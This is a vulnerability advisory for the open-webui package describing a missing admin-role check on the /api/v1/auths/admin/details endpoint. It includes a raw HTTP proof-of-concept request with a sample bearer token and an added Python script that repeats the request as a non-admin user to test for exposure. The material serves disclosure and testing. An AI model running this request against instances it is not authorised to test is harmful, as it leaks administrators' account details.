Undefined Behavior for Input to API affecting open-webui package, versions [0,] (all released versions; no fixed version exists)


Severity

medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.03% (7th percentile)

  • Snyk ID: SNYK-PYTHON-OPENWEBUI-9680265
  • published: 10 Apr 2025
  • disclosed: 20 Mar 2025
  • credit: fewword

Introduced: 20 Mar 2025

CVE-2024-7046
CWE-475 (Undefined Behavior for Input to API)

How to fix?

There is no fixed version for open-webui. Until one is available, the only mitigation is to limit network access to the application's API (see the Note under Overview), since the missing check is on the server side and cannot be compensated for by clients.

Overview

open-webui is the Python package for Open WebUI, a self-hosted web interface for LLM backends.

Affected versions of this package are vulnerable to Undefined Behavior for Input to API (CWE-475) due to improper access control on the /api/v1/auths/admin/details endpoint. The endpoint does not verify that the caller holds the admin role, so a user who can reach the API can retrieve administrative details simply by requesting it directly. The PoC below is an authenticated request; the advisory's point is that the account behind the bearer token does not need administrative privileges.

Note:

This is only exploitable if the attacker has network access to the application's API.

PoC

GET /api/v1/auths/admin/details HTTP/1.1
Host: localhost:8090
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
Content-Type: application/json
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImYxYWE3YTE4LTYxN2UtNGViOC05ZWE4LWYwYjQ2NTMzYzE0ZiJ9.Wrvss1VJkvwdiS4N8C9UBo17jmsY-3wjynuFoMNrMP8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8090/admin/settings/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
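The following script turns the PoC into a repeatable check: it sends the same GET with the bearer token of a non-administrative account and reports whether the instance returns admin details to that caller. This is an added example, not code from Snyk or the Open WebUI project. It assumes only the endpoint path and method shown in the PoC; the ADMIN_FIELDS tuple (which JSON keys count as "admin details") and the `transport` injection point used for the offline demonstration are assumptions for this example.

```python
"""Check whether an Open WebUI instance exposes /api/v1/auths/admin/details
to a non-admin user (the access-control issue described in this advisory).

Added example, not Snyk's or Open WebUI's own code. Assumptions: the path and
method come from the PoC above; ADMIN_FIELDS is a guess at which keys mark a
leak; `transport` lets the check run offline against constructed responses.
"""
import json
import urllib.error
import urllib.request

ENDPOINT = "/api/v1/auths/admin/details"   # from the PoC request line
ADMIN_FIELDS = ("name", "email")            # assumption: keys that identify an admin account


def build_request(base_url: str, token: str) -> urllib.request.Request:
    """The PoC request reduced to what matters: the path and the bearer token."""
    return urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        headers={"Authorization": f"Bearer {token}", "Accept": "application/json"},
        method="GET",
    )


def http_transport(req: urllib.request.Request):
    """Real transport: returns (status, body). 4xx/5xx are returned, not raised."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def classify(status: int, body: str) -> dict:
    """Decide whether a response leaks admin details to the caller.

    Only a 200 with a JSON object carrying at least one non-empty ADMIN_FIELDS
    key counts as exposure; a 401/403, a non-JSON body or an empty object
    does not."""
    try:
        data = json.loads(body)
    except ValueError:
        data = None
    leaked = [f for f in ADMIN_FIELDS if isinstance(data, dict) and data.get(f)]
    return {"status": status, "exposed": status == 200 and bool(leaked), "leaked_fields": leaked}


def check_admin_details(base_url: str, non_admin_token: str, transport=http_transport) -> dict:
    """Call the endpoint as a NON-admin user. exposed=True means the role check
    described in the advisory is missing on this instance."""
    status, body = transport(build_request(base_url, non_admin_token))
    return classify(status, body)


# Constructed responses for an offline run (not captured from a real server).
def fake_vulnerable(req):
    return 200, json.dumps({"name": "Site Admin", "email": "admin@example.com"})


def fake_hardened(req):
    return 401, json.dumps({"detail": "Unauthorized"})


if __name__ == "__main__":
    # Against a live instance, drop the third argument and pass a real
    # low-privilege token; the Host in the PoC was localhost:8090.
    print(check_admin_details("http://localhost:8090", "user-token", fake_vulnerable))
    print(check_admin_details("http://localhost:8090", "user-token", fake_hardened))
```

Run it with a token for an account that is not an administrator; an `exposed` result of True reproduces the advisory's finding on that instance, while a 401/403 indicates the endpoint is enforcing a role check (or the token is invalid, which the status alone does not distinguish).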
